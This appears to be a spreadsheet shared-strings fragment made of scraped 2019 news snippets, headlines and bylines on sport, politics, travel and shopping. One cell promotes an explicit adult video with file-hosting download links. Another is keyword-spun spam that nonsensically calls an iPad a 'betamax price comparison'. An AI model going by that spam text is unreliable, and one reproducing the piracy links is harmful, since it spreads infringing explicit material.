the Champions League: Champions League group stage draw - in full Liverpool's Champions League group, fixture dates and analysis The best and worst groups Liverpool could face in Champions League Champions League group stage draw: Date, time, teams involved Robertson urges Liverpool to become serial winners What Celtic can expect from CFR Cluj or Maccabi Tel Aviv in Europe The post Manchester City Champions League draw: group, fixture dates and analysis appeared first on inews.co.uk. The post Manchester City Champions League draw: group, fixture dates and analysis appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Abstract Seascapes Abstract Seascapes - The main composition technique that I feel I need to work on is simplicity, I have a tendency to over complicate images. In this video I'm out doing some seascapes at sunrise with a clear blue sky so I decided to try some abstract seascapes, or at least one. IRead moreRead more The post Abstract Seascapes appeared first on Scottish Landscape Photography.</t>
  </si>
  <si>
    <t>BERLIN — Germany ranks in international studies as one of the safest, most peaceful countries in the world. Overall crime has declined for the better part of a decade, and statistics show that Germans have relatively few reasons to feel insecure. But don’t tell that to Germans in what has become their summer of anxiety. Since June, a series of crimes — some violent and seemingly random, some targeted and political; some by migrants, and some aimed at them — have jangled nerves and amplified a sense of a nation straining at the seams. The extent of German unease came to the fore of public debate last month after a man shoved a boy and his mother in front of an oncoming train in Frankfurt’s central station in broad daylight at the height of the summer travel season. She managed to roll to safety; her 8-year-old son was crushed and killed. In the online discussion after the boy’s death, the Frankfurt police said on Twitter that the suspect was African, prompting an immediate outcry from members of the far-right, nationalist Alternative for Germany party, usually referred to by its German-language initials, AfD. Security and immigration are key issues for AfD, and its members have condemned Chancellor Angela Merkel’s decision four years ago to allow more than a million migrants into the country as a threat to public stability. “Protect the citizens of our country for once and for all instead of this open-door ‘welcome culture,’ ” Alice Weidel, a leader of the party, wrote on Twitter after the boy died on July 29. The suspect arrested, however, was not a beneficiary of Ms. Merkel’s migration policy, nor even a resident of Germany. The man, identified only as Habte A., was a 40-year-old Eritrean who had been living, working and supporting a family in Switzerland for more than a decade, according to the police there. They had been looking for him, they said, because he had vanished after threatening neighbors in Zurich who thought he had psychological problems. He remains in custody in Frankfurt, where he faces charges of murder and attempted murder. While the case might have been treated as a tragedy born of mental illness, it set off a fevered round of anxiety in a society that prizes order and consensus but is increasingly politically polarized. At a memorial service outside the train station, far-right supporters denouncing immigrants shouted at a crowd of hundreds who had gathered to honor the boy. The situation remained peaceful, but tense. Germany’s interior minister, Horst Seehofer, responded by cutting short his summer vacation to huddle with his top security advisers in Berlin. “The sense of security among people is very fraught, and incidents like that in Frankfurt contribute to it,” Mr. Seehofer told reporters after the meeting. He promised to increase security at train stations and to institute “intelligent” checks at the border with Switzerland. “We have experienced a few things in recent weeks,” he added, without elaborating. Experts point out, however, that such measures may do little to combat the roots of the nation’s anxiety, which lie much deeper in the German psyche and are linked to more intangible fears based in the past. “Big disasters that happen in other places don’t happen in Germany,” said Ortwin Renn, director of the Institute for Advanced Sustainability Studies in Potsdam and a researcher in risk studies. “It’s all pretty benign compared to other parts of the world.” “But throughout history, because of the many catastrophes, Germans are more sensitive,” he added, referring obliquely to World War II and the nation’s devastation and capitulation. ‘‘There is a higher tension and fear that something bad could happen.” That history is now the baseline for a country increasingly divided between those who fear their security is under threat and long for an idealized past, and those who likewise crave stability but know that Germany must adapt, however uncomfortably, to changing times. Those changes include Europe’s shifting politics, digitization and globalization. But for many on both sides, immigration has become the defining issue. “We are living in a time of awakening, from the refugees to Brexit, Trump, Erdogan, climate change — suddenly Germans are feeling that they cannot stop time and remain in the protective bubble of prosperity that has been Germany of the past decade,” said Stephan Grünewald, a psychologist who has focused on this state of affairs. “This has left behind a diffuse angst about the future,” he said. Those fears are not entirely unfounded. While violent crime in Germany is down overall, according to government statistics, crimes committed by supporters of far-right ideology increased 14 percent from 2014 to 2018. Of all crimes recorded last year, 39 percent overall were committed by non-German citizens, though they account for just 12 percent of Germany’s overall population. Headlines from the summer’s start reflect those trends. In July, a public swimming pool in Düsseldorf shut early and began checking IDs after dozens of teenage boys and young men, whom the police described as having a “North African appearance,” were barred after a clash with employees and other patrons. In the exclusive Munich suburb of Starnberg, it was the police who became targets of a group of drunken teenagers when an attempt to free a friend from detention turned into a riot. In early June, Walter Lübcke, a representative of Ms. Merkel’s conservative party, was fatally shot on his front porch in what appears to be the first far-right political assassination in the country since the Nazi era. Homes of members of both the AfD and the Left party, on the other end of the political spectrum, have been targeted with attempted arson and firecrackers as elections near in three eastern states. Recent polls show the far-right party as the strongest force in the east, edging out the chancellor’s conservatives by one percentage point, less than a month before the first states, Brandenburg and Saxony, vote on Sept. 1. All those events made headlines across Germany and fueled public debate and anxiety. A much more muted debate, however, ensued in the town of Wächtersbach, north of Frankfurt, when a German man opened fire on a 26-year-old from Eritrea — no relation to Habte A. — critically wounding him in a drive-by shooting that prosecutors described as racially motivated. That attack took place nine days after the boy was killed at the Frankfurt train station. In a statement released through Jürgen Warncke, a lawyer, the 8-year-old’s parents said it “would be comforting” if their son’s death resulted in more security “in public places and at railway stations.” The family has asked that their names, and their son’s, not be released to allow them to mourn in private. Members of the AfD, however, want to be able to mourn him by name. Eugen Ciresa, a member of Parliament for the party in Baden-Württemberg, refused to accept the child’s privacy, dubbing him “Oskar” in a post on Facebook that demanded, “Give the boy a name so he won’t be forgotten.” Source link</t>
  </si>
  <si>
    <t>Police are looking for a convicted rapist who escaped from a prison in South Gloucestershire. Read more? Click here</t>
  </si>
  <si>
    <t>Rising house prices and a need for lifestyle flexibility have many making a choice to be long-term tenants instead of homeowners</t>
  </si>
  <si>
    <t>FAMOUS British pop star and X-Factor judge Cheryl Cole has been removed from Madame Tussauds in London because she is no longer popular. Daily Express :: Entertainment Feed Cheryl Cole REMOVED from Madame Tussauds: ‘She’s no longer worth it’</t>
  </si>
  <si>
    <t>GAME OF THRONES is now over on HBO and Jon Snow actor Kit Harington has finally revealed the one thing he hated about filming. So what was it? Daily Express :: TV and Radio Feed Game of Thrones: Kit Harington reveals one thing he HATED about GOT – ‘It was horrific’</t>
  </si>
  <si>
    <t>Hannah Palmer shared a new bikini pic today, as she posed in a tiny red bikini top. She mentioned in the captions that she was at the CBD expo earlier today for Bang Energy Drinks, but fans were distracted by her looks. The model smiled with her lips closed for the shot, as she wore pink lipstick and plenty of mascara. She also rocked silver eyeshadow, along with pink blush. Palmer’s bikini top was sequined, and was barely big enough to contain her chest. She also played with her hair with her right hand, revealing her light pink manicure and a white watch. Hannah wore her hair down in curls, and appeared to be in a hotel room. The update was geotagged in Miami, Florida. The revealing photo fired up her fans, many who left Hannah compliments in the comments section. “Those eyes are mesmerizing,” commented a fan, as others also echoed their sentiments. “OMG! You’re so gorgeous,” exclaimed a follower. Click here to continue and read more… The Inquisitr</t>
  </si>
  <si>
    <t>A person familiar with operations at the federal jail where Jeffrey Epstein killed himself says one of the two people guarding him the night he died wasn’t a correctional officer.</t>
  </si>
  <si>
    <t>Charles Watts</t>
  </si>
  <si>
    <t>The Gunners midfielder has not travelled with the squad for Sunday’s game at Newcastle United following the incident outside his home This post written by Charles Watts originally appeared on Football News, Live Scores, Results &amp; Transfers | Goal.com. Read the full post here. Source</t>
  </si>
  <si>
    <t>PLAY ENGLISH HEBREW FLASHCARDS FREE Select English or Hebrew, then select your answer to the prompt word from the four options. Have fun 😉 Republished by Blog Post Promoter</t>
  </si>
  <si>
    <t>Ben Stokes may have ascended to the pantheon of cricket’s modern greats with an innings that will go down in Ashes history but the man who enabled his majestic knock is happy to represent “village cricketers” everywhere. Read more? Click here</t>
  </si>
  <si>
    <t>Stefanos Tsitsipas has made back-to-back first-round exits at Grand Slam tournaments US Open 2019 Venue: Flushing Meadows, New York Dates: 26 Aug – 8 Sep Coverage: Live text and radio commentary on selected matches on the BBC Sport website and app World number eight Stefanos Tsitsipas was knocked out of the US Open in the first round by Russian Andrey Rublev. Rublev, 21, ranked 35 places behind the Greek at 43rd, won 6-4 6-7 (5-7) 7-6 (9-7) 7-5 after Tsitsipas was hampered by cramping. Tsitsipas, 21, tipped as a future Grand Slam champion, has now made first-round exits in the past two majors. “We played an amazing match,” said Rublev, who stunned Roger Federer in Cincinnati in 62 minutes this month. “It was tough conditions for both of us. He started to cramp. I know what it’s like; I was cramping too and tried not to show it. But this is amazing, winning matches like this gives you confidence.” Rublev, who sealed victory in three hours and 56 minutes, will face the winner of the match between France’s Gilles Simon and American Bjorn Fratangelo in the second round. Meanwhile, Wimbledon semi-finalist and 10th seed Roberto Bautista Agut was knocked out with a 3-6 6-1 6-4 3-6 6-3 defeat by Mikhail Kukushkin. Elsewhere, Croatian 2014 champion Marin Cilic, seeded 23rd, beat Slovak Martin Klizan 6-3 6-2 7-6 (8-6) and Italian 24th seed Matteo Berrettini defeated Frenchman Richard Gasquet 6-4 6-3 2-6 6-2.</t>
  </si>
  <si>
    <t>Warm clear waters, white sandy beaches and some peeling right handed reef breaks – Thulusdhoo in The Maldives has some amazing surf to explore! Home to the world famous Cokes Surf Spot this island is a favourite for travelling surfers – so here’s my first mini edit from my time on the island…more footage coming […] The post Surfing In The Maldives At Cokes Surf Spot, Thulusdhoo (Drone Edit) appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Bitter anti-referee sentiment lingers in Auckland, even after the Warriors clung on for the best win of their NRL campaign.</t>
  </si>
  <si>
    <t>Kyoto Top 8 Must-Visit Places The post Kyoto Top 8 Must-Visit Places appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Russia's state communications watchdog has asked Google to stop advertising "illegal mass events" on its YouTube video platform, it says.</t>
  </si>
  <si>
    <t>Georgia Hitch</t>
  </si>
  <si>
    <t>The artist behind a controversial mural vandalised at Bondi Beach says he hopes his new exhibition makes people think critically, and question what is happening around them.</t>
  </si>
  <si>
    <t>Stuck in the commute? Why not try to score 10/10 in our ABC News quiz. You won't win as much as the 16-year-old Fortnite World Cup winner (or anything for that matter) but hey, there's no use crying over spilt yoghurt.</t>
  </si>
  <si>
    <t>The A* to C pass rate is 62.8%, but is still one of the lowest performances of the past 10 years. Read more? Click here</t>
  </si>
  <si>
    <t>JA-PLANNING (OUR TRIP TO JAPAN) The post JA-PLANNING (OUR TRIP TO JAPAN) appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>A rare release of official palace photos of the Thai King’s royal consort have caused a flurry of online attention, causing the royal palace website to crash, according to reports.</t>
  </si>
  <si>
    <t>Hegre-Art – Emily – Self Loving Model(s): Emily Released Date: June 16, 2015 Size: 128 MB Quality: MPEG-4, 1080p, 00:06:37 This is pure erotica at its best. Forget big fancy introductions, this short film promotes itself. All you need to know is this is Emily, filmed on a hotel bed, exploring her body. She doesn鈥檛 care that you鈥檙e watching, her eyes are closed and she鈥檚 focusing on her own pleasure. When she plays and teases with her body it will have you mesmerised. As her fingers move faster and faster, the room fades from her mind. She鈥檚 in another world. The pressure builds inside her, her nerves dance with pleasure until finally her back arches and she releases. Just like Emily, you鈥檙e going to love every second. rapidgator:idolxx.com_061615.hat.emily.1080.mp4 uploaded:idolxx.com_061615.hat.emily.1080.mp4 mexashare:idolxx.com_061615.hat.emily.1080.mp4 katfile:idolxx.com_061615.hat.emily.1080.mp4</t>
  </si>
  <si>
    <t>The betamax price comparison is so new that it can be hard to know all it does. Do not just use this equipment for games. Your compare voip call rates can do so many amazing things. Read on to learn more about what your betamax price comparison can do. It is easy to access all of the running apps on your iPad. Just push the Home button twice in succession to show an icon for each running app. You can scroll through the applications or choose one of them. Swipe downwards to hide the bar again. It is easy to access your running apps on the betamax price, compare voip call rates. To see what you have running, just double-click the Home button. The apps will show up on the bar at the bottom of the screen. You can scroll through the applications or choose one of them. When you no longer want to see it, swipe downwards to eliminate the bar from your screen. A VPN lets you get access to remote servers. If you have a need to connect your iPad through a VPN connection, you need to enable the VPN feature available through Settings and Network. Enter the required username and server address. Connect with that network administrator if the server address is something you don’t know. Server Address Does it irritate you when you get an alert about your iPad detecting a wi-fi network? By going into your settings, you can choose to turn off this feature. If you would rather not be prompted, you can click the Wi-Fi button and you will not have to deal with this anymore. You can use VPN to access a server remotely. This can be activated from the network tab under settings. When prompted, enter your server address and username. If you are unsure of your server address, contact your network administrator. Make sure you check out your currently running apps. Lots of iPad applications can work in the background as you complete other tasks. To check what is running on the iPad, just double click the Home button. The apps in use will appear on the bottom of the screen. Swipe downwards to make the bar disappear when you’ve finished. Did you accidentally launch an app that makes a lot of noise? You are able to mute volume right away by simply pressing and holding the – volume button until sound is off. If you mute a lot, you may configure your lock button into a mute button. If you are getting irritated by the amount of times that you are being asked to join Wi-Fi networks, go into your settings and change it. There is an opportunity for you to turn this off. Choose it and you won’t have to worry about so many notification. If WiFi join notifications annoy you, simply get rid of them. There is an option labeled Ask to Join Networks. Once set to no, you won’t be nagged again. You can change your email settings to preview more of your email. In your Settings menu, click on Mail, and then find the Preview setting. Select the number of lines you’d like to see. By using the five lines option, you can quickly skim your emails. It is possible to preview more than a couple of lines of email by changing settings. Go to your mail settings under the general heading. Reset the number so that it shows five lines at one time Now you can see more of each email in your inbox, speeding up the skimming process. Using shortcuts makes it simpler to send messages. For instance, you can put a space or period in your sentences by tapping on the space bar two times. You can save time by doing these things automatically instead of manually, so that you can easily send messages to more of your friends. Betamax Price Comparison A good way to keep the pages from closing is to open other one in a new tab. When you are in Safari, just tap and hold the link until a pop-up menu shows up. Then just pick to open the page in a brand new tab. You’ll still have your other page handy. Now that you have learned more about the compare voip call rates, you’ll be able to use it more efficiently. There is very little this machine can’t do. With so many features, mastering the betamax price comparison takes a little dedication and the willingness to stay on top of tech trends. The betamax price comparison is constantly updated with new apps. Go to the apps that you usually run easier and quicker. By double clicking the home button, the apps will come up immediately on the bottom of your device. Using this one little trick can save a lot of time instead of having to scroll through all of the screens to find something. Many people would like to understand betamax price , but they don’t always know how they should go about it. This article definitely has the wisdom that you seek. Now, all you have to do is use this article’s tips.</t>
  </si>
  <si>
    <t>Ongoing pipeline project delays and growth in crude-by-rail capacity from Western Canada are leading some oilsands producers to consider spending billions of dollars to build diluent recovery units.</t>
  </si>
  <si>
    <t>Giffgaff has announced that it’s adding more data to its already good value £10, £12 and £15 price plans. Known as goodybags, the £10 plan moves from 3GB to 6GB, the £12 from 4GB to 10GB and the £15 from 8GB to £15. The monthly price for each plan also includes unlimited UK calls and texts. Rejoice! Aside from these outstanding prices for the data on offer, Giffgaff’s plans are attractive thanks to being one month rolling contracts that you can cancel at any time. You can also still change your goodybag each month, and the network will still tell you if you could be spending less. Giffgaff also says that it will continue to add 1GB data to its £10, £12, £15 and £20 goodybags after customers purchase their third. The extra 1GB is added to plans if a person runs out of data that month. These prices and add-ons make Giffgaff an even more competitive force in the UK mobile market where stiff competition between SIM-only providers continues to drive prices down. With prices like this, there’s little reason to get into a pricey 12 or 24 month SIM plan with one of the big four operators. Check out Giffgaff’s plans here on its website. We also round up the best SIM-only deals each month right here. Source link</t>
  </si>
  <si>
    <t>Ashen-faced workers left the Nestlé factory and headed to the Tongala Hotel just after lunch on Wednesday.</t>
  </si>
  <si>
    <t>Emily Baker</t>
  </si>
  <si>
    <t>Phoebe Waller-Bridge, writer and star of Fleabag, creator and executive producer of Killing Eve and as of April this year, writer of the new Bond movie, isn’t exactly one for words of comfort. The whole country is still in mourning over the loss of one of the funniest, most poignant comedies to ever bless our screens after just two series, and while its creator understands, she’s also not overly bothered. In a new interview with The Hollywood Reporter, Waller-Bridge says her devoted audience will eventually “get over” wanting a new series of runaway hit, Fleabag. “People get over shit,” she determines, reportedly giving us the same advice her mother gave her. “If something doesn’t go well, you’ll get over it, everyone will get over it. And if something goes brilliantly, we’ll all get over that, too. “We need things to end to remind us that we are still alive.” The writer and actor is bringing the one woman show from with the TV version of Fleabag was born back to the stage for a limited run this autumn, bringing the character and an era to a final close on 14 September. On how she will feel on closing the chapter which arguably sent her into the stratosphere, Waller-Bridge simply says she will feel “elated”. Read more: TV comedy is not under threat from political correctness – look at Fleabag and Partridge However, it may not be the end of Fleabag forever as the 34-year-old said she might bring the concept back when she’s 50-years-old and “there’s been a life lived and it’s a different face looking down the barrel.” While Fleabag aired on the BBC in the UK, in the US it was made available via Amazon Prime Video. Jeff Bezos recently joined in the cries for PWB to return with a third series of the show, though he has more of a financial stake in it than most. Phoebe Waller-Bridge on the cover of The Hollywood Reporter (Photo: Frank W. Ockenfels 3/The Hollywood Reporter) Unfortunately for Bezos, Waller-Bridge’s return to Amazon’s streaming service seems unlikely, as she says she can “smell a mile off” when people are trying to buy her name rather than her ideas. “I wouldn’t trust that for a second,” she tells the magazine, though does admit “there is certainly an appeal in not having to meet new people all the time” when it comes to signing an overall deal with a streaming service Waller-Bridge is currently working on the next James Bond film and is rumoured to have been paid around the $2 million (£1,657,060) mark to lend a helping hand to the apparently struggling production. “It’s a kind of fantasy nightmare,” she says of the violent, sex-fuelled glamour of James Bond’s world, comparing it to that of Villanelle in Killing Eve. “They live a fantasy! But it’s a life none of us would ever want, if we’re honest. We don’t want to go put a bullet in someone’s head to sleep with people and have martinis.” More from TV Everything you need to know about harrowing docu-drama Murder Case GBBO has a start date and it's sooner than you think Murder Case: How Julie Reilly's killer Andrew Wallace was caught Everything you need to know about Interior Design Masters Everything you need to know about Peaky Blinders series five There’s already a Jeffrey Epstein TV drama in the works The post Phoebe Waller-Bridge will feel ‘elated’ when she says goodbye to Fleabag appeared first on inews.co.uk. The post Phoebe Waller-Bridge will feel ‘elated’ when she says goodbye to Fleabag appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>A drunken Australian holiday maker has been charged after allegedly kicking a local Balinese man off a moving motor cycle and then bouncing off a car.</t>
  </si>
  <si>
    <t>The fashion brand's latest environmental effort is front-and-centre of its newest campaign and flagship store. Read More</t>
  </si>
  <si>
    <t>Boomers stars Andrew Bogut and Patty Mills relished beating Team USA on Saturday, but quickly turned their attention to securing a first medal for Australia.</t>
  </si>
  <si>
    <t>Shannon Verhagen</t>
  </si>
  <si>
    <t>Walking into St Mary’s Catholic Primary School last week was like walking into a library that had come to life, with students dressing up as their favourite characters for Book Week.</t>
  </si>
  <si>
    <t>Gentoo Linux Security Advisory 201908-20 – Multiple vulnerabilities have been found in Mozilla Thunderbird, the worst of which could result in the arbitrary execution of code. Versions less than 60.8.0 are affected. Published at: August 16, 2019 at 10:08PM View on Packet Storm The post Gentoo Linux Security Advisory 201908-20 appeared first on Secured Me.</t>
  </si>
  <si>
    <t>Shads</t>
  </si>
  <si>
    <t>Price drop on the standard black controllers with Amazon. Not sure how long the deal is on for, but cheapest at the moment if you are looking for a new controller.</t>
  </si>
  <si>
    <t>Tamra Carr</t>
  </si>
  <si>
    <t>Geraldton’s private hospital will undergo a $2 million revamp over the next six to 12 months.</t>
  </si>
  <si>
    <t>Matt O'Sullivan</t>
  </si>
  <si>
    <t>More than 50 years after the city's tram network was ripped up, a new tram glided from Town Hall to Circular Quay during the day for the first time.</t>
  </si>
  <si>
    <t>thatsjuicy</t>
  </si>
  <si>
    <t>Friend of mine from the east got this in the letterbox and passed this over to me since I live in the west, saved some cash on my Long Term parking next week. Looks like it only works on Long Term and At Terminal T123 until 31 October (excluding school holidays)</t>
  </si>
  <si>
    <t>North to South •• A surf trip down the California Coast •• Full Film The post North to South •• A surf trip down the California Coast •• Full Film appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Adelaide data architect and software engineer George Sainsbury signed up for the CSIRO Total Wellbeing Diet to manage back pain that flared up when his daughter was one year old. He lost 16kg. Credit: https://www.totalwellbeingdiet.com/au/</t>
  </si>
  <si>
    <t>Welcome to Montreal – one of my favourite cities to visit. This video is a little travel guide where I take you around to explore some amazing things this city has to offer, including: Shopping Shwartz Montreal Biodome Old Montreal Notre Dame Mount Royal Au Sommet Let me know what you think of my travel […] The post Explore Montreal Canada appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>ACETCA was named in a submission by China influence experts to the federal parliamentary joint committee on intelligence and security last year.</t>
  </si>
  <si>
    <t>Charles LeClaire-USA TODAY Sports The Pittsburgh Steelers make their preseason debut Friday night, and it begs the question who you are excited to watch vs. the Buccaneers. The Pittsburgh Steelers finally get back on the football field in live game action for the first time in over 200 days. To say there is excitement from the fan base is an understatement. But with the excitement comes the reality this is just a preseason game, and the players who will truly make up the 2019 Pittsburgh Steelers will be doing more watching than playing. This doesn’t mean there aren’t players fans are excited to watch! There are plenty of players to get excited about watching, and if you have followed the team’s offseason roster, you should be interested throughout the entire game. Players are playing for their professional lives starting tonight, and with that brings plenty of pressure. Here are the players I’m looking forward to watching Friday night, but I want to know who you are excited to watch? Let us know in the comment section below and be a part of the conversation! Marcus Allen, Safety Allen was injured almost all of the 2018 preseason, and I am excited to see what a healthy Allen can do. The team sure could use the depth at safety. Ola Adeniyi, OLB The hype surrounding Ola has been palpable so far throughout training camp. Can Adeniyi put an exclamation point on his work in Week 1? Chris Boswell, K Boswell had a horrible 2018 season, that is well documented, and there is a lot riding on this preseason. His job with the Steelers, a hefty bonus — yeah, there is pressure on Boswell to perform. I’m excited to see how he handles it all. Joshua Dobbs, QB He will get the nod with any starters who will be playing, and his solid play, or lack thereof, will be half of the battle for Mason Rudolph and Devlin Hodges to claim the backup spot. If Dobbs has a poor outing, it opens the door for the other two signal callers. James Washington, WR Washington had a rough rookie season, but will he learn from those experiences and turn them into big plays in 2019? Week 1 is a big stepping stone for the Oklahoma State product. The 2019 Rookie Class There were 9 drafted rookies by the Steelers in the 2019 NFL Draft, and I am excited to watch all of them play in Week 1. Devin Bush, Benny Snell Jr., Isaiah Buggs…all of them. Keep them on your radar the entire game to see how they represent themselves on the professional stage for the first time.</t>
  </si>
  <si>
    <t>Here’s a look at the latest Giants 53-man roster projections after over a dozen training camp practices and two preseason games. Source: Sports Business News</t>
  </si>
  <si>
    <t>Labor Day is a time to celebrate the end of summer and for many the beginning of a new school year. It’s also a fantastic time to shop end of summer deals at your favorite retailers. Labor Day sales include discounts on TVs, furniture, mattresses, and appliances from retailers like Best Buy, Home Depot, Walmart, and more. To help guide you through all the promotions and offers, we’ve put together a list of the best sales that are currently going on. We’ve also hand-picked the top standout deals from a variety of categories such as appliances, electronics, home items and more. Some standout deals include the Vizio 65-inch 4K TV on sale at Walmart for $479.99, the Lenovo Ideapad laptop on sale for $209.99 at Best Buy, and 40% off the Echo Dot at Amazon. We’ll also tell you everything else you need to know about the Labor Day sales event such as the date, retailers that are participating, and what deals you can expect and from what categories. When is Labor Day 2019? Labor Day is a federal holiday that celebrates the economic and social contributions of workers to the United States economy. Labor Day is observed annually on the first Monday of September, and this year it falls on Monday, September 2, with the long holiday weekend kicking off on Friday, August 30. When do Labor Day sales start? Most Labor Day sales start the week before the holiday, but some retailers like Home Depot and Best Buy began their promotions last week. Other retailers won’t start their sales until Friday and some will wait until the actual holiday to offer sitewide discounts. Most offers will last through the weekend and end on Monday, September 2 at midnight. What are the best Labor Day sales? The most popular categories discounted during Labor Day include furniture, home items, TVs, laptops, and appliances. You’ll also find seasonal end-of-summer items on clearance such as patio furniture, grills, outdoor play items, and more. Labor day is also an excellent time to find deals on mattresses with retailers like Casper and Purple offering site-wide sales. Home Depot and Best Buy are just a few retailers that are discounting top-brand appliances all weekend long, and if you’re looking for TV deals, Walmart has fantastic price cuts from LG, Vizio, Samsung, and more. There’s also back to school deals still going on if you’re looking for laptop sales from retailers like Dell and Lenovo. The best Labor Day sales: Amazon – save on smart speakers, tablets, security cameras, and more Walmart – save on electronics, patio and garden, furniture and more Best Buy – save up to 40% on appliance top deals Nectar – $100 off and get two Memory Foam Pillows Overstock – Labor Day blowout, extra 20% off select items + free shipping Mattress Firm – save up to $600 on king and queen mattresses Dell – save up to 40% off TVs, laptops, monitors, and more Bear – use code 20LD to get 20% off + 2 free cloud pillows Home Depot – up to 40% off appliance special buys Lenovo – laptops starting at $329.99 and tech under $100 World Market – save 30% on furniture Casper – get 10% off any order with a mattress now through 9/2 Serta – save up to $900 on select Serta iComfort mattress sets Purple – Free sheets and two pillows when you buy a purple mattress Tempur-Pedic save up to $700 on select mattress sets Lowe’s – save on appliances, tools, grills, and more J Crew – extra 50% off all sale styles with code WEARNOW Our best Labor Day sale picks: You can shop more TV deals with our roundup of the best cheap TV sales and 4K TV deals happening now. You can also shop more of the best Walmart sales and deals that are currently going on. Intology Limited: http://www.intology.co.uk/about-us.php Twitter: https://twitter.com/Intology Facebook: https://www.facebook.com/Intology Read more: Labor Day sales 2019: the best deals on TVs, furniture, mattresses and more</t>
  </si>
  <si>
    <t>Seven eggs from the world's last two remaining white Rhinos have successfully been artificially fertilised. The last male Rhino, a 45-year-old named Sudan, died in 2018 and left only two female members of the species on the planet, Fatu, 19, and Najin, 30. Years of poaching have reduced the number of rhinos to an estimated 650, almost all of which are black rhinos. Image: AP</t>
  </si>
  <si>
    <t>Great to see the British Virgin Islands recover so quickly after Irma. The beautiful beaches are still there, as well as your favorite bars, such as Soggy Dollar and Foxy’s. We know you love all the British Virgin Islands as much as we do, so watch this wonderful video. For more information on our BVI […] The post See the rebirth of the British Virgin Islands with Dream Yacht Charter after Irma appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Accompany Newjetsetters as we explore one of our favourite Las Vegas Hotels and Luxury Brands – The Mandarin Oriental Las Vegas. From the beautiful lobby to the Strip View Suite to the gorgeous pool deck and a peek into the gastronomic, award winning Twist Restaurant, you’ll gain a fabulous insight into what it’s like to […] The post Mandarin Oriental Las Vegas Luxury Hotel Review appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Source: https://techcrunch.com/2019/08/12/spacex-blue-origin-ula-and-northrop-grumman-bid-for-u-s-national-security-launch-contract/ SpaceX, Blue Origin, ULA and Northrop Grumman bid for US national security launch contract The U.S. Air Force is looking to lock in its launch providers for national security satellite missions to take place between 2022 and 2026, and the bids for this so-called “Phase 2” procurement contract are now in. The field of competitors looking to become one of the two companies chosen is a who’s who of U.S. commercial launch providers at the moment, including SpaceX, Blue Origin, ULA and Northrop Grumman. Both Northrop Grumman and Blue Origin are new entrants in this particular launch contracting area, while SpaceX and ULA are existing providers that handle U.S. national security missions. SpaceX additionally has a bit of a head start, since its Falcon rockets are the only proven, certified launch vehicles included in the bids submitted, while ULA has offered up its new Vulcan Centaur, which is tailor-made for the job but not yet certified and flight-proven; the others are still seeking certification. “SpaceX means to serve as the Air Force’s long-term provider for space launch, offering existing, certified and proven launch systems capable of carrying out the full spectrum of national security space launch missions and requirements,” said SpaceX COO and president Gwynne Shotwell in an emailed statement, regarding this new bid. SpaceX clearly sees its Falcon launch system as a key competitive advantage, as it’s flying currently for USAF and national security missions — the company says that this represents the lowest risk for the government overall in terms of providers for this mission, and with known costs, as well. The Air Force will make its final selection about the two winning providers in 2020. Source: https://techcrunch.com/2019/08/12/spacex-blue-origin-ula-and-northrop-grumman-bid-for-u-s-national-security-launch-contract/ The post SpaceX, Blue Origin, ULA and Northrop Grumman bid for US national security launch contract appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>With a fresh injury scare, Tiger Woods has cast doubt on whether he will be able to play in front of Melbourne fans when the Presidents Cup heads to Melbourne in December.</t>
  </si>
  <si>
    <t>FLIGHTS are often the gateway to a holiday overseas, whether they be long-haul or short-haul. Yet Britons on a plane to this much-loved destination are most likely to suffer delays – where is it? Daily Express :: Travel Feed</t>
  </si>
  <si>
    <t>Victoria urgently needs more disposal facilities for dangerous and toxic waste, according to a new report on a spate of toxic factory fires in the state.</t>
  </si>
  <si>
    <t>submitted by /u/gulabjamunyaar [link] [comments] Reliable leaker CoinX on Twitter: “‘Pro’ for iPhone? Crazy naming schemes over the past few years.”</t>
  </si>
  <si>
    <t>Liberalism infects everything. Via Daily Wire: The National Association for Stock Car Auto Racing, otherwise known as NASCAR, has reportedly started to take a “gradual shift” on its stances surrounding the Second Amendment. The revelation comes after multiple gun companies have said that NASCAR, which has a primarily Republican base, banned them from running advertisements […]</t>
  </si>
  <si>
    <t>Patrick Cain</t>
  </si>
  <si>
    <t>People with cannabis hyperemesis syndrome — a problem some heavy smokers get that involves chronic vomiting — are usually told to quit. But some cure it by switching to a legal supply.</t>
  </si>
  <si>
    <t>Fees from international students also comprised a greater chunk of revenue for Victorian universities.</t>
  </si>
  <si>
    <t>“The FIVB has seen the photographs of the Argentinian men’s volleyball … Korea at the women’s Olympic qualifier in Kaliningrad earlier this month. The post Racism infects volleyball appeared first on WSN.</t>
  </si>
  <si>
    <t>The Manchester United manager has championed and discarded the right players so far this season. Source: Sports Business News</t>
  </si>
  <si>
    <t>I firmly believe finals will be back on the agenda in 2020 for Melbourne, for several reasons.</t>
  </si>
  <si>
    <t>Thousands of Syrian migrants have until Tuesday to leave Istanbul or face expulsion from Turkey's biggest city. Authorities have told unregistered migrants to return to the province they are registered in, as part of a bid to relieve pressure on the city. Also in the programme: The future of Italy's governing coalition could be decided today, amid infighting amongst its two parties; and why have one population of stick insects in the UK given up sex? Picture: In this file photo taken on August 06, 2019, family and friends say goodbye as Syrian refugee voluntarily board buses returning to neighbouring Syria in the Esenyurt district of Istanbul. Picture: AFP/Getty Images.</t>
  </si>
  <si>
    <t>Two leaders of an emerging outlaw motorcycle gang have allegedly been busted with drugs and a gun during raids in suburban Adelaide.</t>
  </si>
  <si>
    <t>Alex Nelson</t>
  </si>
  <si>
